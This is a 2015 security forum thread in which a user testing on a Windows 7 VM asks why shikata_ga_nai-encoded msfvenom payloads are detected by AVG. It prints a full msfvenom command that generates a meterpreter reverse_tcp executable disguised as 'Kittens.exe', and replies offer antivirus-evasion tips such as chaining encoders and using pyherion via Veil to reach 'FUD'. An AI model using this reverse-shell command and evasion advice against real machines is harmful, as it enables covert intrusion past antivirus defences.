Hadeus Posted March 27, 2015 Posted March 27, 2015 I've been pentesting on on my Windows 7 VM lately with shikata_ga_nai encoded payloads I've been generating vai Veil-Evasion and msfvenom. For example, I have been using the windows/meterpreter/reverse_tcp reverse stager to call back to me on my handler on kali and it works BUT thats only when AV is turned off, otherwise my payloads are detected by AV (AVG) Are shikata_ga_nai signatures now detectable via AV? Or perhaps I'm encoding my payloads wrong? Here is an example of one of my payloads root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe LHOST=192.168.32.130 LPORT=4444 > Kittens.exe Quote
dustbyter Posted March 27, 2015 Posted March 27, 2015 Yeah I'm pretty sure that most A/V will detect shikata-ga-nai. This method has been around for some time. You can try to run the payload through several encoders to evade A/V, but that is not guaranteed either. Good luck with it! Quote
i8igmac Posted March 27, 2015 Posted March 27, 2015 It was really cool back when it was fully undetectable... its a shame they went public... Research other ways of Quote
ZaraByte Posted March 28, 2015 Posted March 28, 2015 I currently have a video i finished on using Veil Framework i just need to spend some time adding the voice over to the to go with the video i never got around to it was messing around with my old microphone to see if it would be good to use now or not didn't like the audio turn out so i gotta redo it. however i have a old video that i did using Veil Framework reason im doing the video over again is because i pronouced the Veil Framework wrong through the whole video. So i sounded like a complete idiot. https://www.youtube.com/watch?v=9E5RbzsnJAo Quote
Hadeus Posted March 29, 2015 Author Posted March 29, 2015 @ZaraByte Nice Video btw! So I decided to use pyherion (through veil-evasion) on my payloads. It showed up as FUD on the AVG scan. Quote
Xcellerator Posted April 2, 2015 Posted April 2, 2015 I'd recommend you read this: http://schierlm.users.sourceforge.net/avevasion.html Very good article on how the encoders work and what does and doesn't bypass AV evasion. When it comes to binaries, it basically boils down to writing your own code. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.